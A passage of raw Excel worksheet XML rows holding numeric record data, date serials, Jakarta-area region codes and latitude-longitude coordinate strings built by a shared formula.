        <v>3172090</v>
      </c>
      <c r="O338">
        <v>3172</v>
      </c>
      <c r="P338">
        <v>31</v>
      </c>
      <c r="Q338" t="s">
        <v>890</v>
      </c>
      <c r="R338" t="s">
        <v>890</v>
      </c>
      <c r="S338" t="s">
        <v>49</v>
      </c>
      <c r="T338" t="s">
        <v>33</v>
      </c>
      <c r="U338" s="5">
        <v>10689415</v>
      </c>
      <c r="V338" s="5" t="s">
        <v>14763</v>
      </c>
      <c r="W338" s="5">
        <v>-617798</v>
      </c>
      <c r="X338" t="s">
        <v>18572</v>
      </c>
      <c r="Y338" t="str">
        <f t="shared" si="5"/>
        <v>-6.17798,106.89415</v>
      </c>
    </row>
    <row r="339" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A339">
        <v>101965</v>
      </c>
      <c r="B339" s="1">
        <v>43854</v>
      </c>
      <c r="C339" s="2">
        <v>0.15351851851851853</v>
      </c>
      <c r="D339" t="s">
        <v>22</v>
      </c>
      <c r="E339" t="s">
        <v>23</v>
      </c>
      <c r="F339" t="s">
        <v>1582</v>
      </c>
      <c r="G339" t="s">
        <v>1583</v>
      </c>
      <c r="H339" t="s">
        <v>26</v>
      </c>
      <c r="I339" t="s">
        <v>1584</v>
      </c>
      <c r="J339" t="s">
        <v>1585</v>
      </c>
      <c r="L339" t="s">
        <v>1586</v>
      </c>
      <c r="M339">
        <v>3173060006</v>
      </c>
      <c r="N339">
        <v>3173060</v>
      </c>
      <c r="O339">
        <v>3173</v>
      </c>
      <c r="P339">
        <v>31</v>
      </c>
      <c r="Q339" t="s">
        <v>1587</v>
      </c>
      <c r="R339" t="s">
        <v>61</v>
      </c>
      <c r="S339" t="s">
        <v>62</v>
      </c>
      <c r="T339" t="s">
        <v>33</v>
      </c>
      <c r="U339" s="5">
        <v>10685179</v>
      </c>
      <c r="V339" s="5" t="s">
        <v>14764</v>
      </c>
      <c r="W339" s="5">
        <v>-615585</v>
      </c>
      <c r="X339" t="s">
        <v>18573</v>
      </c>
      <c r="Y339" t="str">
        <f t="shared" si="5"/>
        <v>-6.15585,106.85179</v>
      </c>
    </row>
    <row r="340" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A340">
        <v>101966</v>
      </c>
      <c r="B340" s="1">
        <v>43854</v>
      </c>
      <c r="C340" s="2">
        <v>0.15425925925925926</v>
      </c>
      <c r="D340" t="s">
        <v>22</v>
      </c>
      <c r="E340" t="s">
        <v>23</v>
      </c>
      <c r="F340" t="s">
        <v>1588</v>
      </c>
      <c r="G340" t="s">
        <v>1589</v>
      </c>
      <c r="H340" t="s">
        <v>26</v>
      </c>
      <c r="I340" t="s">
        <v>117</v>
      </c>
      <c r="J340" t="s">
        <v>1590</v>
      </c>
      <c r="L340" t="s">
        <v>1591</v>
      </c>
      <c r="M340">
        <v>3175030002</v>
      </c>
      <c r="N340">
        <v>3175030</v>
      </c>
      <c r="O340">
        <v>3175</v>
      </c>
      <c r="P340">
        <v>31</v>
      </c>
      <c r="Q340" t="s">
        <v>1592</v>
      </c>
      <c r="R340" t="s">
        <v>1563</v>
      </c>
      <c r="S340" t="s">
        <v>547</v>
      </c>
      <c r="T340" t="s">
        <v>33</v>
      </c>
      <c r="U340" s="5">
        <v>10689028</v>
      </c>
      <c r="V340" s="5" t="s">
        <v>14765</v>
      </c>
      <c r="W340" s="5">
        <v>-614267</v>
      </c>
      <c r="X340" t="s">
        <v>18574</v>
      </c>
      <c r="Y340" t="str">
        <f t="shared" si="5"/>
        <v>-6.14267,106.89028</v>
      </c>
    </row>
    <row r="341" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A341">
        <v>101967</v>
      </c>
      <c r="B341" s="1">
        <v>43854</v>
      </c>
      <c r="C341" s="2">
        <v>0.15710648148148149</v>
      </c>
      <c r="D341" t="s">
        <v>22</v>
      </c>
      <c r="E341" t="s">
        <v>23</v>
      </c>
      <c r="F341" t="s">
        <v>1593</v>
      </c>
      <c r="G341" t="s">
        <v>1594</v>
      </c>
      <c r="H341" t="s">
        <v>26</v>
      </c>
      <c r="I341" t="s">
        <v>1595</v>
      </c>
      <c r="J341" t="s">
        <v>1596</v>
      </c>
      <c r="L341" t="s">
        <v>1597</v>
      </c>
      <c r="M341">
        <v>3173040001</v>
      </c>
      <c r="N341">
        <v>3173040</v>
      </c>
      <c r="O341">
        <v>3173</v>
      </c>
      <c r="P341">
        <v>31</v>
      </c>
      <c r="Q341" t="s">
        <v>1598</v>
      </c>
      <c r="R341" t="s">
        <v>1598</v>
      </c>
      <c r="S341" t="s">
        <v>62</v>
      </c>
      <c r="T341" t="s">
        <v>33</v>
      </c>
      <c r="U341" s="5">
        <v>10686069</v>
      </c>
      <c r="V341" s="5" t="s">
        <v>14766</v>
      </c>
      <c r="W341" s="5">
        <v>-618265</v>
      </c>
      <c r="X341" t="s">
        <v>18575</v>
      </c>
      <c r="Y341" t="str">
        <f t="shared" si="5"/>
        <v>-6.18265,106.86069</v>
      </c>
    </row>
    <row r="342" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A342">
        <v>101968</v>
      </c>
      <c r="B342" s="1">
        <v>43854</v>
      </c>
      <c r="C342" s="2">
        <v>0.15712962962962962</v>
      </c>
      <c r="D342" t="s">
        <v>22</v>
      </c>
      <c r="E342" t="s">
        <v>23</v>
      </c>
      <c r="F342" t="s">
        <v>1599</v>
      </c>
      <c r="G342" t="s">
        <v>1600</v>
      </c>
      <c r="H342" t="s">
        <v>26</v>
      </c>
      <c r="I342" t="s">
        <v>1490</v>
      </c>
      <c r="J342" t="s">
        <v>1601</v>
      </c>
      <c r="L342" t="s">
        <v>1602</v>
      </c>
      <c r="M342">
        <v>3175030001</v>
      </c>
      <c r="N342">
        <v>3175030</v>
      </c>
      <c r="O342">
        <v>3175</v>
      </c>
      <c r="P342">
        <v>31</v>
      </c>
      <c r="Q342" t="s">
        <v>1574</v>
      </c>
      <c r="R342" t="s">
        <v>1563</v>
      </c>
      <c r="S342" t="s">
        <v>547</v>
      </c>
      <c r="T342" t="s">
        <v>33</v>
      </c>
      <c r="U342" s="5">
        <v>10685931</v>
      </c>
      <c r="V342" s="5" t="s">
        <v>14767</v>
      </c>
      <c r="W342" s="5">
        <v>-614524</v>
      </c>
      <c r="X342" t="s">
        <v>18576</v>
      </c>
      <c r="Y342" t="str">
        <f t="shared" si="5"/>
        <v>-6.14524,106.85931</v>
      </c>
    </row>
    <row r="343" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A343">
        <v>101969</v>
      </c>
      <c r="B343" s="1">
        <v>43854</v>
      </c>
      <c r="C343" s="2">
        <v>0.15857638888888889</v>
      </c>
      <c r="D343" t="s">
        <v>22</v>
      </c>
      <c r="E343" t="s">
        <v>23</v>
      </c>
      <c r="F343" t="s">
        <v>1603</v>
      </c>
      <c r="H343" t="s">
        <v>26</v>
      </c>
      <c r="I343" t="s">
        <v>1604</v>
      </c>
      <c r="J343" t="s">
        <v>1605</v>
      </c>
      <c r="L343" t="s">
        <v>32</v>
      </c>
      <c r="M343">
        <v>3174040007</v>
      </c>
      <c r="N343">
        <v>3174040</v>
      </c>
      <c r="O343">
        <v>3174</v>
      </c>
      <c r="P343">
        <v>31</v>
      </c>
      <c r="Q343" t="s">
        <v>389</v>
      </c>
      <c r="R343" t="s">
        <v>377</v>
      </c>
      <c r="S343" t="s">
        <v>32</v>
      </c>
      <c r="T343" t="s">
        <v>33</v>
      </c>
      <c r="U343" s="5">
        <v>10678829</v>
      </c>
      <c r="V343" s="5" t="s">
        <v>14509</v>
      </c>
      <c r="W343" s="5">
        <v>-614531</v>
      </c>
      <c r="X343" t="s">
        <v>18577</v>
      </c>
      <c r="Y343" t="str">
        <f t="shared" si="5"/>
        <v>-6.14531,106.78829</v>
      </c>
    </row>
    <row r="344" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A344">
        <v>101970</v>
      </c>
      <c r="B344" s="1">
        <v>43854</v>
      </c>
      <c r="C344" s="2">
        <v>0.1585300925925926</v>
      </c>
      <c r="D344" t="s">
        <v>22</v>
      </c>
      <c r="E344" t="s">
        <v>23</v>
      </c>
      <c r="F344" t="s">
        <v>1606</v>
      </c>
      <c r="G344" t="s">
        <v>1607</v>
      </c>
      <c r="H344" t="s">
        <v>26</v>
      </c>
      <c r="I344" t="s">
        <v>72</v>
      </c>
      <c r="J344" t="s">
        <v>1608</v>
      </c>
      <c r="M344">
        <v>3172070002</v>
      </c>
      <c r="N344">
        <v>3172070</v>
      </c>
      <c r="O344">
        <v>3172</v>
      </c>
      <c r="P344">
        <v>31</v>
      </c>
      <c r="Q344" t="s">
        <v>128</v>
      </c>
      <c r="R344" t="s">
        <v>128</v>
      </c>
      <c r="S344" t="s">
        <v>49</v>
      </c>
      <c r="T344" t="s">
        <v>33</v>
      </c>
      <c r="U344" s="5">
        <v>10691772</v>
      </c>
      <c r="V344" s="5" t="s">
        <v>14768</v>
      </c>
      <c r="W344" s="5">
        <v>-623494</v>
      </c>
      <c r="X344" t="s">
        <v>18578</v>
      </c>
      <c r="Y344" t="str">
        <f t="shared" si="5"/>
        <v>-6.23494,106.91772</v>
      </c>
    </row>
    <row r="345" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A345">
        <v>101971</v>
      </c>
      <c r="B345" s="1">
        <v>43854</v>
      </c>
      <c r="C345" s="2">
        <v>0.16290509259259259</v>
      </c>
      <c r="D345" t="s">
        <v>22</v>
      </c>
      <c r="E345" t="s">
        <v>23</v>
      </c>
      <c r="F345" t="s">
        <v>1609</v>
      </c>
      <c r="G345" t="s">
        <v>1610</v>
      </c>
      <c r="H345" t="s">
        <v>26</v>
      </c>
      <c r="I345" t="s">
        <v>1611</v>
      </c>
      <c r="J345" t="s">
        <v>1612</v>
      </c>
      <c r="L345" t="s">
        <v>1613</v>
      </c>
      <c r="M345">
        <v>3175030005</v>
      </c>
      <c r="N345">
        <v>3175030</v>
      </c>
      <c r="O345">
        <v>3175</v>
      </c>
      <c r="P345">
        <v>31</v>
      </c>
      <c r="Q345" t="s">
        <v>1568</v>
      </c>
      <c r="R345" t="s">
        <v>1563</v>
      </c>
      <c r="S345" t="s">
        <v>547</v>
      </c>
      <c r="T345" t="s">
        <v>33</v>
      </c>
      <c r="U345" s="5">
        <v>10688780</v>
      </c>
      <c r="V345" s="5" t="s">
        <v>14769</v>
      </c>
      <c r="W345" s="5">
        <v>-613378</v>
      </c>
      <c r="X345" t="s">
        <v>18579</v>
      </c>
      <c r="Y345" t="str">
        <f t="shared" si="5"/>
        <v>-6.13378,106.88780</v>
      </c>
    </row>
    <row r="346" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A346">
        <v>101972</v>
      </c>
      <c r="B346" s="1">
        <v>43854</v>
      </c>
      <c r="C346" s="2">
        <v>0.1640625</v>
      </c>
      <c r="D346" t="s">
        <v>22</v>
      </c>
      <c r="E346" t="s">
        <v>23</v>
      </c>
      <c r="F346" t="s">
        <v>1614</v>
      </c>
      <c r="G346" t="s">
        <v>1615</v>
      </c>
      <c r="H346" t="s">
        <v>26</v>
      </c>
      <c r="I346" t="s">
        <v>517</v>
      </c>
      <c r="J346" t="s">
        <v>1616</v>
      </c>
      <c r="L346" t="s">
        <v>1617</v>
      </c>
      <c r="M346">
        <v>3175010001</v>
      </c>
      <c r="N346">
        <v>3175010</v>
      </c>
      <c r="O346">
        <v>3175</v>
      </c>
      <c r="P346">
        <v>31</v>
      </c>
      <c r="Q346" t="s">
        <v>1618</v>
      </c>
      <c r="R346" t="s">
        <v>546</v>
      </c>
      <c r="S346" t="s">
        <v>547</v>
      </c>
      <c r="T346" t="s">
        <v>33</v>
      </c>
      <c r="U346" s="5">
        <v>10671824</v>
      </c>
      <c r="V346" s="5" t="s">
        <v>14770</v>
      </c>
      <c r="W346" s="5">
        <v>-609583</v>
      </c>
      <c r="X346" t="s">
        <v>18580</v>
      </c>
      <c r="Y346" t="str">
        <f t="shared" si="5"/>
        <v>-6.09583,106.71824</v>
      </c>
    </row>
    <row r="347" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A347">
        <v>101973</v>
      </c>
      <c r="B347" s="1">
        <v>43854</v>
      </c>
      <c r="C347" s="2">
        <v>0.16546296296296295</v>
      </c>
      <c r="D347" t="s">
        <v>22</v>
      </c>
      <c r="E347" t="s">
        <v>23</v>
      </c>
      <c r="F347" t="s">
        <v>1619</v>
      </c>
      <c r="G347" t="s">
        <v>1620</v>
      </c>
      <c r="H347" t="s">
        <v>26</v>
      </c>
      <c r="I347" t="s">
        <v>1621</v>
      </c>
      <c r="J347" t="s">
        <v>1566</v>
      </c>
      <c r="M347">
        <v>3175030005</v>
      </c>
      <c r="N347">
        <v>3175030</v>
      </c>
      <c r="O347">
        <v>3175</v>
      </c>
      <c r="P347">
        <v>31</v>
      </c>
      <c r="Q347" t="s">
        <v>1568</v>
      </c>
      <c r="R347" t="s">
        <v>1563</v>
      </c>
      <c r="S347" t="s">
        <v>547</v>
      </c>
      <c r="T347" t="s">
        <v>33</v>
      </c>
      <c r="U347" s="5">
        <v>10688693</v>
      </c>
      <c r="V347" s="5" t="s">
        <v>14771</v>
      </c>
      <c r="W347" s="5">
        <v>-613670</v>
      </c>
      <c r="X347" t="s">
        <v>18581</v>
      </c>
      <c r="Y347" t="str">
        <f t="shared" si="5"/>
        <v>-6.13670,106.88693</v>
      </c>
    </row>
    <row r="348" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A348">
        <v>101974</v>
      </c>
      <c r="B348" s="1">
        <v>43854</v>
      </c>
      <c r="C348" s="2">
        <v>0.16804398148148147</v>
      </c>
      <c r="D348" t="s">
        <v>22</v>
      </c>
      <c r="E348" t="s">
        <v>23</v>
      </c>
      <c r="F348" t="s">
        <v>1622</v>
      </c>
      <c r="G348" t="s">
        <v>1623</v>
      </c>
      <c r="H348" t="s">
        <v>26</v>
      </c>
      <c r="I348" t="s">
        <v>1624</v>
      </c>
      <c r="J348" t="s">
        <v>1100</v>
      </c>
      <c r="L348" t="s">
        <v>1625</v>
      </c>
      <c r="M348">
        <v>3172090007</v>
      </c>
      <c r="N348">
        <v>3172090</v>
      </c>
      <c r="O348">
        <v>3172</v>
      </c>
      <c r="P348">
        <v>31</v>
      </c>
      <c r="Q348" t="s">
        <v>890</v>
      </c>
      <c r="R348" t="s">
        <v>890</v>
      </c>
      <c r="S348" t="s">
        <v>49</v>
      </c>
      <c r="T348" t="s">
        <v>33</v>
      </c>
      <c r="U348" s="5">
        <v>10689536</v>
      </c>
      <c r="V348" s="5" t="s">
        <v>14772</v>
      </c>
      <c r="W348" s="5">
        <v>-617789</v>
      </c>
      <c r="X348" t="s">
        <v>18582</v>
      </c>
      <c r="Y348" t="str">
        <f t="shared" si="5"/>
        <v>-6.17789,106.89536</v>
      </c>
    </row>
    <row r="349" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A349">
        <v>101975</v>
      </c>
      <c r="B349" s="1">
        <v>43854</v>
      </c>
      <c r="C349" s="2">
        <v>0.16790509259259259</v>
      </c>
      <c r="D349" t="s">
        <v>22</v>
      </c>
      <c r="E349" t="s">
        <v>23</v>
      </c>
      <c r="F349" t="s">
        <v>1626</v>
      </c>
      <c r="G349" t="s">
        <v>1627</v>
      </c>
      <c r="H349" t="s">
        <v>26</v>
      </c>
      <c r="I349" t="s">
        <v>27</v>
      </c>
      <c r="J349" t="s">
        <v>1628</v>
      </c>
      <c r="L349" t="s">
        <v>1629</v>
      </c>
      <c r="M349">
        <v>3171100005</v>
      </c>
      <c r="N349">
        <v>3171100</v>
      </c>
      <c r="O349">
        <v>3171</v>
      </c>
      <c r="P349">
        <v>31</v>
      </c>
      <c r="Q349" t="s">
        <v>1630</v>
      </c>
      <c r="R349" t="s">
        <v>107</v>
      </c>
      <c r="S349" t="s">
        <v>108</v>
      </c>
      <c r="T349" t="s">
        <v>33</v>
      </c>
      <c r="U349" s="5">
        <v>10684315</v>
      </c>
      <c r="V349" s="5" t="s">
        <v>14773</v>
      </c>
      <c r="W349" s="5">
        <v>-621966</v>
      </c>
      <c r="X349" t="s">
        <v>18583</v>
      </c>
      <c r="Y349" t="str">
        <f t="shared" si="5"/>
        <v>-6.21966,106.84315</v>
      </c>
    </row>
    <row r="350" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A350">
        <v>101976</v>
      </c>
      <c r="B350" s="1">
        <v>43854</v>
      </c>
      <c r="C350" s="2">
        <v>0.17241898148148149</v>
      </c>
      <c r="D350" t="s">
        <v>22</v>
      </c>
      <c r="E350" t="s">
        <v>23</v>
      </c>
      <c r="F350" t="s">
        <v>1631</v>
      </c>
      <c r="G350" t="s">
        <v>1632</v>
      </c>
      <c r="H350" t="s">
        <v>26</v>
      </c>
      <c r="I350" t="s">
        <v>1633</v>
      </c>
      <c r="J350" t="s">
        <v>1634</v>
      </c>
      <c r="L350" t="s">
        <v>1635</v>
      </c>
      <c r="M350">
        <v>3174070004</v>
      </c>
      <c r="N350">
        <v>3174070</v>
      </c>
      <c r="O350">
        <v>3174</v>
      </c>
      <c r="P350">
        <v>31</v>
      </c>
      <c r="Q350" t="s">
        <v>926</v>
      </c>
      <c r="R350" t="s">
        <v>84</v>
      </c>
      <c r="S350" t="s">
        <v>32</v>
      </c>
      <c r="T350" t="s">
        <v>33</v>
      </c>
      <c r="U350" s="5">
        <v>10674779</v>
      </c>
      <c r="V350" s="5" t="s">
        <v>14774</v>
      </c>
      <c r="W350" s="5">
        <v>-614109</v>
      </c>
      <c r="X350" t="s">
        <v>18584</v>
      </c>
      <c r="Y350" t="str">
        <f t="shared" si="5"/>
        <v>-6.14109,106.74779</v>
      </c>
    </row>
    <row r="351" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A351">
        <v>101977</v>
      </c>
      <c r="B351" s="1">
        <v>43854</v>
      </c>
      <c r="C351" s="2">
        <v>0.17331018518518518</v>
      </c>
      <c r="D351" t="s">
        <v>22</v>
      </c>
      <c r="E351" t="s">
        <v>23</v>
      </c>
      <c r="F351" t="s">
        <v>1636</v>
      </c>
      <c r="G351" t="s">
        <v>1637</v>
      </c>
      <c r="H351" t="s">
        <v>26</v>
      </c>
      <c r="I351" t="s">
        <v>1638</v>
      </c>
      <c r="J351" t="s">
        <v>1022</v>
      </c>
      <c r="L351" t="s">
        <v>1639</v>
      </c>
      <c r="M351">
        <v>3172060002</v>
      </c>
      <c r="N351">
        <v>3172060</v>
      </c>
      <c r="O351">
        <v>3172</v>
      </c>
      <c r="P351">
        <v>31</v>
      </c>
      <c r="Q351" t="s">
        <v>1025</v>
      </c>
      <c r="R351" t="s">
        <v>48</v>
      </c>
      <c r="S351" t="s">
        <v>49</v>
      </c>
      <c r="T351" t="s">
        <v>33</v>
      </c>
      <c r="U351" s="5">
        <v>10687588</v>
      </c>
      <c r="V351" s="5" t="s">
        <v>14775</v>
      </c>
      <c r="W351" s="5">
        <v>-624452</v>
      </c>
      <c r="X351" t="s">
        <v>18585</v>
      </c>
      <c r="Y351" t="str">
        <f t="shared" si="5"/>
        <v>-6.24452,106.87588</v>
      </c>
    </row>
    <row r="352" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A352">
        <v>101978</v>
      </c>
      <c r="B352" s="1">
        <v>43854</v>
      </c>
      <c r="C352" s="2">
        <v>0.17609953703703704</v>
      </c>
      <c r="D352" t="s">
        <v>22</v>
      </c>
      <c r="E352" t="s">
        <v>23</v>
      </c>
      <c r="F352" t="s">
        <v>1640</v>
      </c>
      <c r="G352" t="s">
        <v>1641</v>
      </c>
      <c r="H352" t="s">
        <v>26</v>
      </c>
      <c r="I352" t="s">
        <v>961</v>
      </c>
      <c r="J352" t="s">
        <v>1642</v>
      </c>
      <c r="L352" t="s">
        <v>1643</v>
      </c>
      <c r="M352">
        <v>3172020003</v>
      </c>
      <c r="N352">
        <v>3172020</v>
      </c>
      <c r="O352">
        <v>3172</v>
      </c>
      <c r="P352">
        <v>31</v>
      </c>
      <c r="Q352" t="s">
        <v>1644</v>
      </c>
      <c r="R352" t="s">
        <v>1644</v>
      </c>
      <c r="S352" t="s">
        <v>49</v>
      </c>
      <c r="T352" t="s">
        <v>33</v>
      </c>
      <c r="U352" s="5">
        <v>10687535</v>
      </c>
      <c r="V352" s="5" t="s">
        <v>14776</v>
      </c>
      <c r="W352" s="5">
        <v>-633219</v>
      </c>
      <c r="X352" t="s">
        <v>18586</v>
      </c>
      <c r="Y352" t="str">
        <f t="shared" si="5"/>
        <v>-6.33219,106.87535</v>
      </c>
    </row>
    <row r="353" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A353">
        <v>101979</v>
      </c>
      <c r="B353" s="1">
        <v>43854</v>
      </c>
      <c r="C353" s="2">
        <v>0.17879629629629631</v>
      </c>
      <c r="D353" t="s">
        <v>22</v>
      </c>
      <c r="E353" t="s">
        <v>23</v>
      </c>
      <c r="F353" t="s">
        <v>1645</v>
      </c>
      <c r="G353" t="s">
        <v>1646</v>
      </c>
      <c r="H353" t="s">
        <v>26</v>
      </c>
      <c r="I353" t="s">
        <v>1647</v>
      </c>
      <c r="J353" t="s">
        <v>1585</v>
      </c>
      <c r="L353" t="s">
        <v>1648</v>
      </c>
      <c r="M353">
        <v>3173060006</v>
      </c>
      <c r="N353">
        <v>3173060</v>
      </c>
      <c r="O353">
        <v>3173</v>
      </c>
      <c r="P353">
        <v>31</v>
      </c>
      <c r="Q353" t="s">
        <v>1587</v>
      </c>
      <c r="R353" t="s">
        <v>61</v>
      </c>
      <c r="S353" t="s">
        <v>62</v>
      </c>
      <c r="T353" t="s">
        <v>33</v>
      </c>
      <c r="U353" s="5">
        <v>10685238</v>
      </c>
      <c r="V353" s="5" t="s">
        <v>14777</v>
      </c>
      <c r="W353" s="5">
        <v>-615269</v>
      </c>
      <c r="X353" t="s">
        <v>18587</v>
      </c>
      <c r="Y353" t="str">
        <f t="shared" si="5"/>
        <v>-6.15269,106.85238</v>
      </c>
    </row>
    <row r="354" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A354">
        <v>101980</v>
      </c>
      <c r="B354" s="1">
        <v>43854</v>
      </c>
      <c r="C354" s="2">
        <v>0.18342592592592591</v>
      </c>
      <c r="D354" t="s">
        <v>22</v>
      </c>
      <c r="E354" t="s">
        <v>23</v>
      </c>
      <c r="F354" t="s">
        <v>1649</v>
      </c>
      <c r="G354" t="s">
        <v>1650</v>
      </c>
      <c r="H354" t="s">
        <v>26</v>
      </c>
      <c r="I354" t="s">
        <v>1651</v>
      </c>
      <c r="J354" t="s">
        <v>1652</v>
      </c>
      <c r="L354" t="s">
        <v>1653</v>
      </c>
      <c r="M354">
        <v>3173060006</v>
      </c>
      <c r="N354">
        <v>3173060</v>
      </c>
      <c r="O354">
        <v>3173</v>
      </c>
      <c r="P354">
        <v>31</v>
      </c>
      <c r="Q354" t="s">
        <v>1587</v>
      </c>
      <c r="R354" t="s">
        <v>61</v>
      </c>
      <c r="S354" t="s">
        <v>62</v>
      </c>
      <c r="T354" t="s">
        <v>33</v>
      </c>
      <c r="U354" s="5">
        <v>10685675</v>
      </c>
      <c r="V354" s="5" t="s">
        <v>14778</v>
      </c>
      <c r="W354" s="5">
        <v>-615537</v>
      </c>
      <c r="X354" t="s">
        <v>18588</v>
      </c>
      <c r="Y354" t="str">
        <f t="shared" si="5"/>
        <v>-6.15537,106.85675</v>
      </c>
    </row>
    <row r="355" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A355">
        <v>101981</v>
      </c>
      <c r="B355" s="1">
        <v>43854</v>
      </c>
      <c r="C355" s="2">
        <v>0.1801736111111111</v>
      </c>
      <c r="D355" t="s">
        <v>85</v>
      </c>
      <c r="E355" t="s">
        <v>23</v>
      </c>
      <c r="F355" t="s">
        <v>1654</v>
      </c>
      <c r="G355" t="s">
        <v>1655</v>
      </c>
      <c r="H355" t="s">
        <v>26</v>
      </c>
      <c r="I355" t="s">
        <v>1059</v>
      </c>
      <c r="J355" t="s">
        <v>1656</v>
      </c>
      <c r="K355" t="s">
        <v>1657</v>
      </c>
      <c r="L355" t="s">
        <v>1658</v>
      </c>
      <c r="M355">
        <v>3173080003</v>
      </c>
      <c r="N355">
        <v>3173080</v>
      </c>
      <c r="O355">
        <v>3173</v>
      </c>
      <c r="P355">
        <v>31</v>
      </c>
      <c r="Q355" t="s">
        <v>157</v>
      </c>
      <c r="R355" t="s">
        <v>157</v>
      </c>
      <c r="S355" t="s">
        <v>62</v>
      </c>
      <c r="T355" t="s">
        <v>33</v>
      </c>
      <c r="U355" s="5">
        <v>10682473</v>
      </c>
      <c r="V355" s="5" t="s">
        <v>14779</v>
      </c>
      <c r="W355" s="5">
        <v>-618139</v>
      </c>
      <c r="X355" t="s">
        <v>18589</v>
      </c>
      <c r="Y355" t="str">
        <f t="shared" si="5"/>
        <v>-6.18139,106.82473</v>
      </c>
    </row>
    <row r="356" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A356">
        <v>101982</v>
      </c>
      <c r="B356" s="1">
        <v>43854</v>
      </c>
      <c r="C356" s="2">
        <v>0.19793981481481482</v>
      </c>
      <c r="D356" t="s">
        <v>22</v>
      </c>
      <c r="E356" t="s">
        <v>23</v>
      </c>
      <c r="F356" t="s">
        <v>1659</v>
      </c>
      <c r="G356" t="s">
        <v>1660</v>
      </c>
      <c r="H356" t="s">
        <v>26</v>
      </c>
      <c r="I356" t="s">
        <v>1661</v>
      </c>
      <c r="J356" t="s">
        <v>1662</v>
      </c>
      <c r="L356" t="s">
        <v>1663</v>
      </c>
      <c r="M356">
        <v>3175030002</v>
      </c>
      <c r="N356">
        <v>3175030</v>
      </c>
      <c r="O356">
        <v>3175</v>
      </c>
      <c r="P356">
        <v>31</v>
      </c>
      <c r="Q356" t="s">
        <v>1592</v>
      </c>
      <c r="R356" t="s">
        <v>1563</v>
      </c>
      <c r="S356" t="s">
        <v>547</v>
      </c>
      <c r="T356" t="s">
        <v>33</v>
      </c>
      <c r="U356" s="5">
        <v>10686208</v>
      </c>
      <c r="V356" s="5" t="s">
        <v>14780</v>
      </c>
      <c r="W356" s="5">
        <v>-615091</v>
      </c>
      <c r="X356" t="s">
        <v>18590</v>
      </c>
      <c r="Y356" t="str">
        <f t="shared" si="5"/>
        <v>-6.15091,106.86208</v>
      </c>
    </row>
    <row r="357" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A357">
        <v>101983</v>
      </c>
      <c r="B357" s="1">
        <v>43854</v>
      </c>
      <c r="C357" s="2">
        <v>0.20819444444444443</v>
      </c>
      <c r="D357" t="s">
        <v>22</v>
      </c>
      <c r="E357" t="s">
        <v>23</v>
      </c>
      <c r="F357" t="s">
        <v>1664</v>
      </c>
      <c r="H357" t="s">
        <v>26</v>
      </c>
      <c r="I357" t="s">
        <v>1665</v>
      </c>
      <c r="J357" t="s">
        <v>1666</v>
      </c>
      <c r="L357" t="s">
        <v>1667</v>
      </c>
      <c r="M357">
        <v>3171090007</v>
      </c>
      <c r="N357">
        <v>3171090</v>
      </c>
      <c r="O357">
        <v>3171</v>
      </c>
      <c r="P357">
        <v>31</v>
      </c>
      <c r="Q357" t="s">
        <v>346</v>
      </c>
      <c r="R357" t="s">
        <v>347</v>
      </c>
      <c r="S357" t="s">
        <v>108</v>
      </c>
      <c r="T357" t="s">
        <v>33</v>
      </c>
      <c r="U357" s="5">
        <v>10685173</v>
      </c>
      <c r="V357" s="5" t="s">
        <v>14781</v>
      </c>
      <c r="W357" s="5">
        <v>-621073</v>
      </c>
      <c r="X357" t="s">
        <v>18591</v>
      </c>
      <c r="Y357" t="str">
        <f t="shared" si="5"/>
        <v>-6.21073,106.85173</v>
      </c>
    </row>
    <row r="358" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A358">
        <v>101984</v>
      </c>
      <c r="B358" s="1">
        <v>43854</v>
      </c>
      <c r="C358" s="2">
        <v>0.20819444444444443</v>
      </c>
      <c r="D358" t="s">
        <v>22</v>
      </c>
      <c r="E358" t="s">
        <v>23</v>
      </c>
      <c r="F358" t="s">
        <v>1668</v>
      </c>
      <c r="G358" t="s">
        <v>1669</v>
      </c>
      <c r="H358" t="s">
        <v>26</v>
      </c>
      <c r="I358" t="s">
        <v>1670</v>
      </c>
      <c r="J358" t="s">
        <v>1671</v>
      </c>
      <c r="L358" t="s">
        <v>1672</v>
      </c>
      <c r="M358">
        <v>3172050007</v>
      </c>
      <c r="N358">
        <v>3172050</v>
      </c>
      <c r="O358">
        <v>3172</v>
      </c>
      <c r="P358">
        <v>31</v>
      </c>
      <c r="Q358" t="s">
        <v>1673</v>
      </c>
      <c r="R358" t="s">
        <v>358</v>
      </c>
      <c r="S358" t="s">
        <v>49</v>
      </c>
      <c r="T358" t="s">
        <v>33</v>
      </c>
      <c r="U358" s="5">
        <v>10686782</v>
      </c>
      <c r="V358" s="5" t="s">
        <v>14782</v>
      </c>
      <c r="W358" s="5">
        <v>-624572</v>
      </c>
      <c r="X358" t="s">
        <v>18592</v>
      </c>
      <c r="Y358" t="str">
        <f t="shared" si="5"/>
        <v>-6.24572,106.86782</v>
      </c>
    </row>
    <row r="359" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A359">
        <v>101985</v>
      </c>
      <c r="B359" s="1">
        <v>43854</v>
      </c>
      <c r="C359" s="2">
        <v>0.20806712962962962</v>
      </c>
      <c r="D359" t="s">
        <v>22</v>
      </c>
      <c r="E359" t="s">
        <v>23</v>
      </c>
      <c r="F359" t="s">
        <v>1674</v>
      </c>
      <c r="G359" t="s">
        <v>1675</v>
      </c>
      <c r="H359" t="s">
        <v>26</v>
      </c>
      <c r="I359" t="s">
        <v>523</v>
      </c>
      <c r="J359" t="s">
        <v>1676</v>
      </c>
      <c r="L359" t="s">
        <v>1677</v>
      </c>
      <c r="M359">
